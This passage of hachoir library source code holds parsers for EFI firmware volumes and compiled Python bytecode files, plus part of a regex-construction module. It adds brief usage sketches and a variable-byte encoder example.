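`UIntVbe` and `IntVbe` implement little-endian variable-byte encoding: seven payload bits per byte, with the high bit flagging a continuation (and, for the signed variant, a sign bit in the first byte). A standalone encoder for the unsigned case, matching the decoder above:
```python
# Sketch: unsigned variable-byte encoder matching UIntVbe's decoder
# (7 payload bits per byte, bit 7 set on every byte except the last).
def encode_uint_vbe(value):
    out = bytearray()
    while True:
        byte = value & 0x7F
        value >>= 7
        if value:
            out.append(byte | 0x80)   # more bytes follow
        else:
            out.append(byte)
            return bytes(out)

assert encode_uint_vbe(0) == b"\x00"
assert encode_uint_vbe(127) == b"\x7f"
assert encode_uint_vbe(128) == b"\x80\x01"
assert encode_uint_vbe(300) == b"\xac\x02"   # 44 + (2 << 7) == 300
```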
#### File: parser/misc/pifv.py
```python
from hachoir.parser import Parser
from hachoir.field import (FieldSet,
UInt8, UInt16, UInt24, UInt32, UInt64, Enum,
CString, String, PaddingBytes, RawBytes, NullBytes)
from hachoir.core.endian import LITTLE_ENDIAN
from hachoir.core.tools import paddingSize, humanFilesize
from hachoir.parser.common.win32 import GUID
EFI_SECTION_COMPRESSION = 0x1
EFI_SECTION_GUID_DEFINED = 0x2
EFI_SECTION_PE32 = 0x10
EFI_SECTION_PIC = 0x11
EFI_SECTION_TE = 0x12
EFI_SECTION_DXE_DEPEX = 0x13
EFI_SECTION_VERSION = 0x14
EFI_SECTION_USER_INTERFACE = 0x15
EFI_SECTION_COMPATIBILITY16 = 0x16
EFI_SECTION_FIRMWARE_VOLUME_IMAGE = 0x17
EFI_SECTION_FREEFORM_SUBTYPE_GUID = 0x18
EFI_SECTION_RAW = 0x19
EFI_SECTION_PEI_DEPEX = 0x1b
EFI_SECTION_TYPE = {
EFI_SECTION_COMPRESSION: "Encapsulation section where other sections"
+ " are compressed",
EFI_SECTION_GUID_DEFINED: "Encapsulation section where other sections"
+ " have format defined by a GUID",
EFI_SECTION_PE32: "PE32+ Executable image",
EFI_SECTION_PIC: "Position-Independent Code",
EFI_SECTION_TE: "Terse Executable image",
EFI_SECTION_DXE_DEPEX: "DXE Dependency Expression",
EFI_SECTION_VERSION: "Version, Text and Numeric",
EFI_SECTION_USER_INTERFACE: "User-Friendly name of the driver",
EFI_SECTION_COMPATIBILITY16: "DOS-style 16-bit EXE",
EFI_SECTION_FIRMWARE_VOLUME_IMAGE: "PI Firmware Volume image",
EFI_SECTION_FREEFORM_SUBTYPE_GUID: "Raw data with GUID in header to"
+ " define format",
EFI_SECTION_RAW: "Raw data",
EFI_SECTION_PEI_DEPEX: "PEI Dependency Expression",
}
EFI_FV_FILETYPE_RAW = 0x1
EFI_FV_FILETYPE_FREEFORM = 0x2
EFI_FV_FILETYPE_SECURITY_CORE = 0x3
EFI_FV_FILETYPE_PEI_CORE = 0x4
EFI_FV_FILETYPE_DXE_CORE = 0x5
EFI_FV_FILETYPE_PEIM = 0x6
EFI_FV_FILETYPE_DRIVER = 0x7
EFI_FV_FILETYPE_COMBINED_PEIM_DRIVER = 0x8
EFI_FV_FILETYPE_APPLICATION = 0x9
EFI_FV_FILETYPE_FIRMWARE_VOLUME_IMAGE = 0xb
EFI_FV_FILETYPE_FFS_PAD = 0xf0
EFI_FV_FILETYPE = {
EFI_FV_FILETYPE_RAW: "Binary data",
EFI_FV_FILETYPE_FREEFORM: "Sectioned data",
EFI_FV_FILETYPE_SECURITY_CORE: "Platform core code used during the SEC"
+ " phase",
EFI_FV_FILETYPE_PEI_CORE: "PEI Foundation",
EFI_FV_FILETYPE_DXE_CORE: "DXE Foundation",
EFI_FV_FILETYPE_PEIM: "PEI module (PEIM)",
EFI_FV_FILETYPE_DRIVER: "DXE driver",
EFI_FV_FILETYPE_COMBINED_PEIM_DRIVER: "Combined PEIM/DXE driver",
EFI_FV_FILETYPE_APPLICATION: "Application",
EFI_FV_FILETYPE_FIRMWARE_VOLUME_IMAGE: "Firmware volume image",
EFI_FV_FILETYPE_FFS_PAD: "Pad File For FFS",
}
for x in range(0xc0, 0xe0):
EFI_FV_FILETYPE[x] = "OEM File"
for x in range(0xe0, 0xf0):
EFI_FV_FILETYPE[x] = "Debug/Test File"
for x in range(0xf1, 0x100):
EFI_FV_FILETYPE[x] = "Firmware File System Specific File"
class BlockMap(FieldSet):
static_size = 8 * 8
def createFields(self):
yield UInt32(self, "num_blocks")
yield UInt32(self, "len")
def createDescription(self):
return "%d blocks of %s" % (
self["num_blocks"].value, humanFilesize(self["len"].value))
class FileSection(FieldSet):
COMPRESSION_TYPE = {
0: 'Not Compressed',
1: 'Standard Compression',
}
def __init__(self, *args, **kw):
FieldSet.__init__(self, *args, **kw)
self._size = self["size"].value * 8
section_type = self["type"].value
if section_type in (EFI_SECTION_DXE_DEPEX, EFI_SECTION_PEI_DEPEX):
            # These sections can sometimes be longer than their declared
            # size! It's so nice to have such detailed specs and then not
            # follow them ...
if self.stream.readBytes(self.absolute_address +
self._size, 1) == b'\0':
self._size = self._size + 16
def createFields(self):
# Header
yield UInt24(self, "size")
yield Enum(UInt8(self, "type"), EFI_SECTION_TYPE)
section_type = self["type"].value
if section_type == EFI_SECTION_COMPRESSION:
yield UInt32(self, "uncomp_len")
yield Enum(UInt8(self, "comp_type"), self.COMPRESSION_TYPE)
elif section_type == EFI_SECTION_FREEFORM_SUBTYPE_GUID:
yield GUID(self, "sub_type_guid")
elif section_type == EFI_SECTION_GUID_DEFINED:
yield GUID(self, "section_definition_guid")
yield UInt16(self, "data_offset")
yield UInt16(self, "attributes")
elif section_type == EFI_SECTION_USER_INTERFACE:
yield CString(self, "file_name", charset="UTF-16-LE")
elif section_type == EFI_SECTION_VERSION:
yield UInt16(self, "build_number")
yield CString(self, "version", charset="UTF-16-LE")
# Content
content_size = (self.size - self.current_size) // 8
if content_size == 0:
return
if section_type == EFI_SECTION_COMPRESSION:
compression_type = self["comp_type"].value
if compression_type == 1:
while not self.eof:
yield RawBytes(self, "compressed_content", content_size)
else:
while not self.eof:
yield FileSection(self, "section[]")
elif section_type == EFI_SECTION_FIRMWARE_VOLUME_IMAGE:
yield FirmwareVolume(self, "firmware_volume")
else:
yield RawBytes(self, "content", content_size,
EFI_SECTION_TYPE.get(self["type"].value,
"Unknown Section Type"))
def createDescription(self):
return EFI_SECTION_TYPE.get(self["type"].value,
"Unknown Section Type")
class File(FieldSet):
def __init__(self, *args, **kw):
FieldSet.__init__(self, *args, **kw)
self._size = self["size"].value * 8
def createFields(self):
# Header
yield GUID(self, "name")
yield UInt16(self, "integrity_check")
yield Enum(UInt8(self, "type"), EFI_FV_FILETYPE)
yield UInt8(self, "attributes")
yield UInt24(self, "size")
yield UInt8(self, "state")
# Content
while not self.eof:
yield FileSection(self, "section[]")
def createDescription(self):
return "%s: %s containing %d section(s)" % (
self["name"].value,
self["type"].display,
len(self.array("section")))
class FirmwareVolume(FieldSet):
def __init__(self, *args, **kw):
FieldSet.__init__(self, *args, **kw)
if not self._size:
self._size = self["volume_len"].value * 8
def createFields(self):
# Header
yield NullBytes(self, "zero_vector", 16)
yield GUID(self, "fs_guid")
yield UInt64(self, "volume_len")
yield String(self, "signature", 4)
yield UInt32(self, "attributes")
yield UInt16(self, "header_len")
yield UInt16(self, "checksum")
yield UInt16(self, "ext_header_offset")
yield UInt8(self, "reserved")
yield UInt8(self, "revision")
while True:
bm = BlockMap(self, "block_map[]")
yield bm
if bm['num_blocks'].value == 0 and bm['len'].value == 0:
break
# TODO must handle extended header
# Content
while not self.eof:
padding = paddingSize(self.current_size // 8, 8)
if padding:
yield PaddingBytes(self, "padding[]", padding)
yield File(self, "file[]")
def createDescription(self):
return "Firmware Volume containing %d file(s)" % len(self.array("file"))
class PIFVFile(Parser):
endian = LITTLE_ENDIAN
MAGIC = b'_FVH'
PARSER_TAGS = {
"id": "pifv",
"category": "program",
"file_ext": ("bin", ""),
"min_size": 64 * 8, # smallest possible header
"magic_regex": ((b"\0{16}.{24}" + MAGIC, 0), ),
"description": "EFI Platform Initialization Firmware Volume",
}
def validate(self):
if self.stream.readBytes(40 * 8, 4) != self.MAGIC:
return "Invalid magic number"
if self.stream.readBytes(0, 16) != b"\0" * 16:
return "Invalid zero vector"
return True
def createFields(self):
while not self.eof:
yield FirmwareVolume(self, "firmware_volume[]")
```
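A minimal usage sketch for this parser, assuming hachoir's generic `createParser` entry point and a placeholder firmware path (neither appears in the file above):
```python
# Hedged sketch: walk the firmware volumes of a PI firmware image. The
# path is a placeholder; createParser returns a PIFVFile if validate()
# accepts the stream.
from hachoir.parser import createParser

parser = createParser("firmware.bin")
if parser:
    for volume in parser.array("firmware_volume"):
        print(volume.description)
        for ffs_file in volume.array("file"):
            print("   ", ffs_file.description)
```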
#### File: parser/program/python.py
```python
from hachoir.parser import Parser
from hachoir.field import (FieldSet, UInt8,
UInt16, Int32, UInt32, Int64, ParserError, Float64,
Character, RawBytes, PascalString8, TimestampUnix32,
Bit, String)
from hachoir.core.endian import LITTLE_ENDIAN
from hachoir.core.bits import long2raw
from hachoir.core.text_handler import textHandler, hexadecimal
DISASSEMBLE = False
if DISASSEMBLE:
from dis import dis
def disassembleBytecode(field):
bytecode = field.value
dis(bytecode)
# --- String and string reference ---
def parseString(parent):
yield UInt32(parent, "length", "Length")
length = parent["length"].value
if parent.name == "lnotab":
bytecode_offset = 0
line_number = parent['../firstlineno'].value
for i in range(0, length, 2):
bc_off_delta = UInt8(parent, 'bytecode_offset_delta[]')
yield bc_off_delta
bytecode_offset += bc_off_delta.value
bc_off_delta._description = 'Bytecode Offset %i' % bytecode_offset
line_number_delta = UInt8(parent, 'line_number_delta[]')
yield line_number_delta
line_number += line_number_delta.value
line_number_delta._description = 'Line Number %i' % line_number
elif 0 < length:
yield RawBytes(parent, "text", length, "Content")
if DISASSEMBLE and parent.name == "compiled_code":
disassembleBytecode(parent["text"])
def parseStringRef(parent):
yield textHandler(UInt32(parent, "ref"), hexadecimal)
def createStringRefDesc(parent):
return "String ref: %s" % parent["ref"].display
# --- Integers ---
def parseInt32(parent):
yield Int32(parent, "value")
def parseInt64(parent):
yield Int64(parent, "value")
def parseLong(parent):
yield Int32(parent, "digit_count")
for index in range(abs(parent["digit_count"].value)):
yield UInt16(parent, "digit[]")
# --- Float and complex ---
def parseFloat(parent):
yield PascalString8(parent, "value")
def parseBinaryFloat(parent):
yield Float64(parent, "value")
def parseComplex(parent):
yield PascalString8(parent, "real")
yield PascalString8(parent, "complex")
def parseBinaryComplex(parent):
yield Float64(parent, "real")
yield Float64(parent, "complex")
# --- Tuple and list ---
def parseTuple(parent):
yield UInt32(parent, "count", "Item count")
count = parent["count"].value
if count < 0:
raise ParserError("Invalid tuple/list count")
for index in range(count):
yield Object(parent, "item[]")
def parseSmallTuple(parent):
yield UInt8(parent, "count", "Item count")
count = parent["count"].value
if count < 0:
raise ParserError("Invalid tuple/list count")
for index in range(count):
yield Object(parent, "item[]")
def createTupleDesc(parent):
count = parent["count"].value
items = "%s items" % count
return "%s: %s" % (parent.code_info[2], items)
# --- Dict ---
def parseDict(parent):
"""
Format is: (key1, value1, key2, value2, ..., keyn, valuen, NULL)
where each keyi and valuei is an object.
"""
parent.count = 0
while True:
key = Object(parent, "key[]")
yield key
if key["bytecode"].value == "0":
break
yield Object(parent, "value[]")
parent.count += 1
def createDictDesc(parent):
return "Dict: %s" % ("%s keys" % parent.count)
def parseRef(parent):
yield UInt32(parent, "n", "Reference")
def parseShortASCII(parent):
size = UInt8(parent, "len", "Number of ASCII characters")
yield size
yield String(parent, "text", size.value, "String content", charset="ASCII")
# --- Code ---
def parseCode(parent):
if 0x3000000 <= parent.root.getVersion():
yield UInt32(parent, "arg_count", "Argument count")
yield UInt32(parent, "kwonlyargcount", "Keyword only argument count")
yield UInt32(parent, "nb_locals", "Number of local variables")
yield UInt32(parent, "stack_size", "Stack size")
yield UInt32(parent, "flags")
elif 0x2030000 <= parent.root.getVersion():
yield UInt32(parent, "arg_count", "Argument count")
yield UInt32(parent, "nb_locals", "Number of local variables")
yield UInt32(parent, "stack_size", "Stack size")
yield UInt32(parent, "flags")
else:
yield UInt16(parent, "arg_count", "Argument count")
yield UInt16(parent, "nb_locals", "Number of local variables")
yield UInt16(parent, "stack_size", "Stack size")
yield UInt16(parent, "flags")
yield Object(parent, "compiled_code")
yield Object(parent, "consts")
yield Object(parent, "names")
yield Object(parent, "varnames")
if 0x2000000 <= parent.root.getVersion():
yield Object(parent, "freevars")
yield Object(parent, "cellvars")
yield Object(parent, "filename")
yield Object(parent, "name")
if 0x2030000 <= parent.root.getVersion():
yield UInt32(parent, "firstlineno", "First line number")
else:
yield UInt16(parent, "firstlineno", "First line number")
yield Object(parent, "lnotab")
class Object(FieldSet):
bytecode_info = {
        # Doesn't contain any data
'0': ("null", None, "NULL", None),
'N': ("none", None, "None", None),
'F': ("false", None, "False", None),
'T': ("true", None, "True", None),
'S': ("stop_iter", None, "StopIter", None),
'.': ("ellipsis", None, "ELLIPSIS", None),
'?': ("unknown", None, "Unknown", None),
'i': ("int32", parseInt32, "Int32", None),
'I': ("int64", parseInt64, "Int64", None),
'f': ("float", parseFloat, "Float", None),
'g': ("bin_float", parseBinaryFloat, "Binary float", None),
'x': ("complex", parseComplex, "Complex", None),
'y': ("bin_complex", parseBinaryComplex, "Binary complex", None),
'l': ("long", parseLong, "Long", None),
's': ("string", parseString, "String", None),
't': ("interned", parseString, "Interned", None),
'u': ("unicode", parseString, "Unicode", None),
'R': ("string_ref", parseStringRef, "String ref", createStringRefDesc),
'(': ("tuple", parseTuple, "Tuple", createTupleDesc),
')': ("small_tuple", parseSmallTuple, "Tuple", createTupleDesc),
'[': ("list", parseTuple, "List", createTupleDesc),
'<': ("set", parseTuple, "Set", createTupleDesc),
'>': ("frozenset", parseTuple, "Frozen set", createTupleDesc),
'{': ("dict", parseDict, "Dict", createDictDesc),
'c': ("code", parseCode, "Code", None),
'r': ("ref", parseRef, "Reference", None),
'z': ("short_ascii", parseShortASCII, "Short ASCII", None),
'Z': ("short_ascii_interned", parseShortASCII, "Short ASCII interned", None),
}
def __init__(self, parent, name, **kw):
FieldSet.__init__(self, parent, name, **kw)
code = self["bytecode"].value
if code not in self.bytecode_info:
raise ParserError('Unknown bytecode %r at position %s'
% (code, self.absolute_address // 8))
self.code_info = self.bytecode_info[code]
if not name:
self._name = self.code_info[0]
if code == "l":
self.createValue = self.createValueLong
elif code in ("i", "I", "f", "g"):
self.createValue = lambda: self["value"].value
elif code == "T":
self.createValue = lambda: True
elif code == "F":
self.createValue = lambda: False
elif code in ("x", "y"):
self.createValue = self.createValueComplex
elif code in ("s", "t", "u"):
self.createValue = self.createValueString
self.createDisplay = self.createDisplayString
if code == 't':
if not hasattr(self.root, 'string_table'):
self.root.string_table = []
self.root.string_table.append(self)
elif code == 'R':
if hasattr(self.root, 'string_table'):
self.createValue = self.createValueStringRef
def createValueString(self):
if "text" in self:
return self["text"].value
else:
return ""
def createDisplayString(self):
if "text" in self:
return self["text"].display
else:
return "(empty)"
def createValueLong(self):
is_negative = self["digit_count"].value < 0
count = abs(self["digit_count"].value)
total = 0
for index in range(count - 1, -1, -1):
total <<= 15
total += self["digit[%u]" % index].value
if is_negative:
total = -total
return total
def createValueStringRef(self):
return self.root.string_table[self['ref'].value].value
def createDisplayStringRef(self):
return self.root.string_table[self['ref'].value].display
def createValueComplex(self):
return complex(
float(self["real"].value),
float(self["complex"].value))
def createFields(self):
yield BytecodeChar(self, "bytecode", "Bytecode")
yield Bit(self, "flag_ref", "Is a reference?")
parser = self.code_info[1]
if parser:
yield from parser(self)
def createDescription(self):
create = self.code_info[3]
if create:
return create(self)
else:
return self.code_info[2]
class BytecodeChar(Character):
static_size = 7
class PythonCompiledFile(Parser):
PARSER_TAGS = {
"id": "python",
"category": "program",
"file_ext": ("pyc", "pyo"),
"min_size": 9 * 8,
"description": "Compiled Python script (.pyc/.pyo files)"
}
endian = LITTLE_ENDIAN
    # Dictionary which associates the pyc magic number (16-bit integer)
    # to a Python version string (eg. "m\xf2\r\n" => "Python 2.4b1").
    # This list comes from the CPython source code, see MAGIC_NUMBER
    # in Lib/importlib/_bootstrap_external.py
MAGIC = {
# Python 1.x
20121: ("1.5", 0x1050000),
50428: ("1.6", 0x1060000),
# Python 2.x
50823: ("2.0", 0x2000000),
60202: ("2.1", 0x2010000),
60717: ("2.2", 0x2020000),
62011: ("2.3a0", 0x2030000),
62021: ("2.3a0", 0x2030000),
62041: ("2.4a0", 0x2040000),
62051: ("2.4a3", 0x2040000),
62061: ("2.4b1", 0x2040000),
62071: ("2.5a0", 0x2050000),
62081: ("2.5a0 (ast-branch)", 0x2050000),
62091: ("2.5a0 (with)", 0x2050000),
62092: ("2.5a0 (WITH_CLEANUP opcode)", 0x2050000),
62101: ("2.5b3", 0x2050000),
62111: ("2.5b3", 0x2050000),
62121: ("2.5c1", 0x2050000),
62131: ("2.5c2", 0x2050000),
62151: ("2.6a0", 0x2070000),
62161: ("2.6a1", 0x2070000),
62171: ("2.7a0", 0x2070000),
62181: ("2.7a0", 0x2070000),
62191: ("2.7a0", 0x2070000),
62201: ("2.7a0", 0x2070000),
62211: ("2.7a0", 0x2070000),
# Python 3.x
3000: ("3.0 (3000)", 0x3000000),
3010: ("3.0 (3010)", 0x3000000),
3020: ("3.0 (3020)", 0x3000000),
3030: ("3.0 (3030)", 0x3000000),
3040: ("3.0 (3040)", 0x3000000),
3050: ("3.0 (3050)", 0x3000000),
3060: ("3.0 (3060)", 0x3000000),
3061: ("3.0 (3061)", 0x3000000),
3071: ("3.0 (3071)", 0x3000000),
3081: ("3.0 (3081)", 0x3000000),
3091: ("3.0 (3091)", 0x3000000),
3101: ("3.0 (3101)", 0x3000000),
3103: ("3.0 (3103)", 0x3000000),
3111: ("3.0a4", 0x3000000),
3131: ("3.0a5", 0x3000000),
3141: ("3.1a0", 0x3010000),
3151: ("3.1a0", 0x3010000),
3160: ("3.2a0", 0x3020000),
3170: ("3.2a1", 0x3020000),
3180: ("3.2a2", 0x3020000),
3190: ("Python 3.3a0", 0x3030000),
3200: ("Python 3.3a0 ", 0x3030000),
3210: ("Python 3.3a0 ", 0x3030000),
3220: ("Python 3.3a1 ", 0x3030000),
3230: ("Python 3.3a4 ", 0x3030000),
3250: ("Python 3.4a1 ", 0x3040000),
3260: ("Python 3.4a1 ", 0x3040000),
3270: ("Python 3.4a1 ", 0x3040000),
3280: ("Python 3.4a1 ", 0x3040000),
3290: ("Python 3.4a4 ", 0x3040000),
3300: ("Python 3.4a4 ", 0x3040000),
3310: ("Python 3.4rc2", 0x3040000),
3320: ("Python 3.5a0 ", 0x3050000),
3330: ("Python 3.5b1 ", 0x3050000),
3340: ("Python 3.5b2 ", 0x3050000),
3350: ("Python 3.5b2 ", 0x3050000),
3351: ("Python 3.5.2 ", 0x3050000),
3360: ("Python 3.6a0 ", 0x3060000),
3361: ("Python 3.6a0 ", 0x3060000),
3370: ("Python 3.6a1 ", 0x3060000),
3371: ("Python 3.6a1 ", 0x3060000),
3372: ("Python 3.6a1 ", 0x3060000),
3373: ("Python 3.6b1 ", 0x3060000),
3375: ("Python 3.6b1 ", 0x3060000),
3376: ("Python 3.6b1 ", 0x3060000),
3377: ("Python 3.6b1 ", 0x3060000),
3378: ("Python 3.6b2 ", 0x3060000),
3379: ("Python 3.6rc1", 0x3060000),
3390: ("Python 3.7a0 ", 0x3070000),
}
    # Dictionary which associates the pyc signature (4-byte string)
    # to a Python version string (eg. "m\xf2\r\n" => "2.4b1")
STR_MAGIC = dict(
(long2raw(magic | (ord('\r') << 16) |
(ord('\n') << 24), LITTLE_ENDIAN), value[0])
for magic, value in MAGIC.items())
def validate(self):
magic_number = self["magic_number"].value
if magic_number not in self.MAGIC:
return "Unknown magic number (%s)" % magic_number
if self["magic_string"].value != "\r\n":
return r"Wrong magic string (\r\n)"
version = self.getVersion()
if version >= 0x3030000 and self['magic_number'].value >= 3200:
offset = 12
else:
offset = 8
value = self.stream.readBits(offset * 8, 7, self.endian)
if value != ord(b'c'):
return "First object bytecode is not code"
return True
def getVersion(self):
if not hasattr(self, "version"):
signature = self.stream.readBits(0, 16, self.endian)
self.version = self.MAGIC[signature][1]
return self.version
def createFields(self):
yield UInt16(self, "magic_number", "Magic number")
yield String(self, "magic_string", 2, r"Magic string \r\n", charset="ASCII")
yield TimestampUnix32(self, "timestamp", "Timestamp")
version = self.getVersion()
if version >= 0x3030000 and self['magic_number'].value >= 3200:
yield UInt32(self, "filesize", "Size of the Python source file (.py) modulo 2**32")
yield Object(self, "content")
```
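A quick usage sketch, again assuming hachoir's `createParser` helper and a placeholder `.pyc` path:
```python
# Hedged sketch: read the header fields and the top-level code object of
# a compiled Python file. "example.pyc" is a placeholder.
from hachoir.parser import createParser

pyc = createParser("example.pyc")
if pyc:
    print("magic:", pyc["magic_number"].value)
    print("timestamp:", pyc["timestamp"].display)
    print("top-level object:", pyc["content"].description)
```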
#### File: hachoir/regex/regex.py
```python
import re
import operator
from hachoir.core.tools import makePrintable
def matchSingleValue(regex):
"""
Regex only match one exact string.
>>> matchSingleValue(RegexEmpty())
True
>>> matchSingleValue(createString("abc"))
True
>>> matchSingleValue(createRange("a", "b"))
False
>>> matchSingleValue(createRange("a"))
True
>>> matchSingleValue(RegexAnd((RegexStart(), createString("abc"))))
True
"""
cls = regex.__class__
if cls in (RegexEmpty, RegexString, RegexStart, RegexEnd):
return True
if cls == RegexAnd:
return all(matchSingleValue(item) for item in regex)
if cls == RegexRange:
return len(regex.ranges) == 1 and len(regex.ranges[0]) == 1
return False
def escapeRegex(text):
"""
    Escape a string for use in a regular expression:
    prefix the special characters ^.+*?{}[]|()\$ with a backslash.
"""
return re.sub(r"([][^.+*?{}|()\\$])", r"\\\1", text)
def _join(func, regex_list):
if not isinstance(regex_list, (tuple, list)):
regex_list = list(regex_list)
if len(regex_list) == 0:
return RegexEmpty()
regex = regex_list[0]
for item in regex_list[1:]:
regex = func(regex, item)
return regex
def createString(text):
"""
>>> createString('')
<RegexEmpty ''>
>>> createString('abc')
<RegexString 'abc'>
"""
if text:
return RegexString(text)
else:
return RegexEmpty()
def createRange(*text, **kw):
"""
Create a regex range using character list.
>>> createRange("a", "d", "b")
<RegexRange '[abd]'>
>>> createRange("-", "9", "4", "3", "0")
<RegexRange '[0349-]'>
"""
ranges = (RegexRangeCharacter(item) for item in text)
return RegexRange(ranges, kw.get('exclude', False))
class Regex:
"""
Abstract class defining a regular expression atom
"""
def minLength(self):
"""
        Minimum length in characters of the regex.
        Returns None if it cannot be computed.
"""
raise NotImplementedError()
def maxLength(self):
"""
Maximum length in characters of the regex.
Returns None if there is no limit.
"""
return self.minLength()
def __str__(self, **kw):
if not hasattr(self, "_str_value"):
self._str_value = {}
key = kw.get('python', False)
if key not in self._str_value:
self._str_value[key] = self._str(**kw)
return self._str_value[key]
def _str(self, **kw):
raise NotImplementedError()
def __repr__(self, **kw):
regex = self.__str__(**kw)
regex = makePrintable(regex, 'ASCII')
return "<%s '%s'>" % (
self.__class__.__name__, regex)
def __contains__(self, item):
raise NotImplementedError()
def match(self, other):
"""
        Guess if self may match the other regex.
        May return False even if self does match it.
"""
if self == other:
return True
return self._match(other)
def _match(self, other):
"""
        Does this regex match the other regex?
        Eg. "." matches "0" or "[a-z]", but "0" doesn't match ".".
        This function is used by match(), which already checks regex identity.
"""
return False
def _and(self, regex):
"""
Create new optimized version of a+b.
Returns None if there is no interesting optimization.
"""
return None
def __and__(self, regex):
"""
Create new optimized version of a & b.
Returns None if there is no interesting optimization.
>>> RegexEmpty() & RegexString('a')
<RegexString 'a'>
"""
if regex.__class__ == RegexEmpty:
return self
new_regex = self._and(regex)
if new_regex:
return new_regex
else:
return RegexAnd((self, regex))
def __add__(self, regex):
return self.__and__(regex)
def or_(self, other):
"""
Create new optimized version of a|b.
Returns None if there is no interesting optimization.
"""
# (a|a) => a
if self == other:
return self
        # a matches b => a
if self._match(other):
return self
        # b matches a => b
if other._match(self):
return other
# Try to optimize (a|b)
if self.__class__ != other.__class__:
new_regex = self._or_(other, False)
if new_regex:
return new_regex
# Try to optimize (b|a)
new_regex = other._or_(self, True)
if new_regex:
return new_regex
return None
else:
return self._or_(other, False)
def _or_(self, other, reverse):
"""
        Try to create an optimized version of self|other if reverse is False,
        or of other|self if reverse is True.
"""
return None
def __or__(self, other):
"""
        Public method of the OR operator: a|b. It calls the internal or_()
        method. If or_() returns None, a RegexOr object is used; otherwise
        the or_() result is returned.
"""
# Try to optimize (a|b)
new_regex = self.or_(other)
if new_regex:
return new_regex
# Else use (a|b)
return RegexOr((self, other))
def __eq__(self, regex):
if self.__class__ != regex.__class__:
return False
return self._eq(regex)
def _eq(self, other):
"""
        Check whether two objects of the same class are equal
"""
raise NotImplementedError(
"Class %s has no method _eq()" % self.__class__.__name__)
def compile(self, **kw):
return re.compile(self.__str__(**kw))
def findPrefix(self, regex):
"""
Try to create a common prefix between two regex.
Eg. "abc" and "abd" => "ab"
Return None if no prefix can be found.
"""
return None
def __iter__(self):
raise NotImplementedError()
class RegexEmpty(Regex):
def minLength(self):
return 0
def _str(self, **kw):
return ''
def _and(self, other):
return other
def _eq(self, other):
return True
class RegexWord(RegexEmpty):
def _and(self, other):
if other.__class__ == RegexWord:
return self
return None
def _str(self, **kw):
return r'\b'
class RegexStart(RegexEmpty):
def _and(self, other):
if other.__class__ == RegexStart:
return self
return None
def _str(self, **kw):
return '^'
class RegexEnd(RegexStart):
def _and(self, other):
if other.__class__ == RegexEnd:
return self
return None
def _str(self, **kw):
return '$'
class RegexDot(Regex):
def minLength(self):
return 1
def _str(self, **kw):
return '.'
def _match(self, other):
if other.__class__ == RegexRange:
return True
if other.__class__ == RegexString and len(other.text) == 1:
return True
return False
def _eq(self, other):
return True
class RegexString(Regex):
def __init__(self, text=""):
assert isinstance(text, str)
self.text = text
assert 1 <= len(self.text)
def minLength(self):
return len(self.text)
def _and(self, regex):
"""
>>> RegexString('a') + RegexString('b')
<RegexString 'ab'>
"""
if regex.__class__ == RegexString:
return RegexString(self.text + regex.text)
return None
def _str(self, **kw):
return escapeRegex(self.text)
def findPrefix(self, regex):
"""
Try to find a common prefix of two string regex, returns:
- None if there is no common prefix
- (prefix, regexa, regexb) otherwise => prefix + (regexa|regexb)
>>> RegexString('color red').findPrefix(RegexString('color blue'))
(<RegexString 'color '>, <RegexString 'red'>, <RegexString 'blue'>)
"""
if regex.__class__ != RegexString:
return None
texta = self.text
textb = regex.text
# '(a|b)' => '[ab]'
if len(texta) == len(textb) == 1:
return (createRange(texta, textb), RegexEmpty(), RegexEmpty())
# '(text abc|text def)' => 'text (abc|def)'
common = None
for length in range(1, min(len(texta), len(textb)) + 1):
if textb.startswith(texta[:length]):
common = length
else:
break
if not common:
return None
return (RegexString(texta[:common]), createString(texta[common:]), createString(textb[common:]))
def _or_(self, other, reverse):
"""
Remove duplicate:
>>> RegexString("color") | RegexString("color")
<RegexString 'color'>
Group prefix:
>>> RegexString("color red") | RegexString("color blue")
<RegexAnd 'color (red|blue)'>
>>> RegexString("color red") | RegexString("color")
<RegexAnd 'color( red|)'>
"""
# Don't know any other optimization for str|other
if other.__class__ != RegexString:
return None
# Find common prefix
common = self.findPrefix(other)
if common:
if not reverse:
regex = common[1] | common[2]
else:
regex = common[2] | common[1]
return common[0] + regex
return None
def _eq(self, other):
return self.text == other.text
class RegexRangeItem:
def __init__(self, cmin, cmax=None):
try:
self.cmin = cmin
if cmax is not None:
self.cmax = cmax
else:
self.cmax = cmin
except TypeError:
raise TypeError("RegexRangeItem: two characters expected (%s, %s) found" % (
type(cmin), type(cmax)))
if self.cmax < self.cmin:
raise TypeError("RegexRangeItem: minimum (%u) is bigger than maximum (%u)" %
(self.cmin, self.cmax))
def __len__(self):
return (self.cmax - self.cmin + 1)
def __contains__(self, value):
assert issubclass(value.__class__, RegexRangeItem)
return (self.cmin <= value.cmin) and (value.cmax <= self.cmax)
def __str__(self, **kw):
cmin = chr(self.cmin)
if self.cmin != self.cmax:
cmax = chr(self.cmax)
if (self.cmin + 1) == self.cmax:
return "%s%s" % (cmin, cmax)
else:
return "%s-%s" % (cmin, cmax)
else:
return cmin
def __repr__(self):
return "<RegexRangeItem %u-%u>" % (self.cmin, self.cmax)
class RegexRangeCharacter(RegexRangeItem):
def __init__(self, char):
RegexRangeItem.__init__(self, ord(char), ord(char))
class RegexRange(Regex):
def __init__(self, ranges, exclude=False, optimize=True):
if optimize:
self.ranges = []
for item in ranges:
RegexRange.rangeAdd(self.ranges, item)
self.ranges.sort(key=lambda item: item.cmin)
else:
self.ranges = tuple(ranges)
self.exclude = exclude
@staticmethod
def rangeAdd(ranges, itemb):
"""
        Add a value to a RegexRangeItem() list:
        remove duplicates and merge ranges when possible.
"""
new = None
for index, itema in enumerate(ranges):
if itema in itemb:
# [b] + [a-c] => [a-c]
new = itemb
break
elif itemb in itema:
# [a-c] + [b] => [a-c]
return
elif (itemb.cmax + 1) == itema.cmin:
# [d-f] + [a-c] => [a-f]
new = RegexRangeItem(itemb.cmin, itema.cmax)
break
elif (itema.cmax + 1) == itemb.cmin:
# [a-c] + [d-f] => [a-f]
new = RegexRangeItem(itema.cmin, itemb.cmax)
break
if new:
del ranges[index]
RegexRange.rangeAdd(ranges, new)
return
else:
ranges.append(itemb)
def minLength(self):
return 1
def _match(self, other):
"""
>>> createRange("a") | createRange("b")
<RegexRange '[ab]'>
>>> createRange("a", "b", exclude=True) | createRange("a", "c", exclude=True)
<RegexRange '[^a-c]'>
"""
if not self.exclude and other.__class__ == RegexString and len(other.text) == 1:
branges = (RegexRangeCharacter(other.text),)
elif other.__class__ == RegexRange and self.exclude == other.exclude:
branges = other.ranges
else:
return None
for itemb in branges:
if not any(itemb in itema for itema in self.ranges):
return False
return True
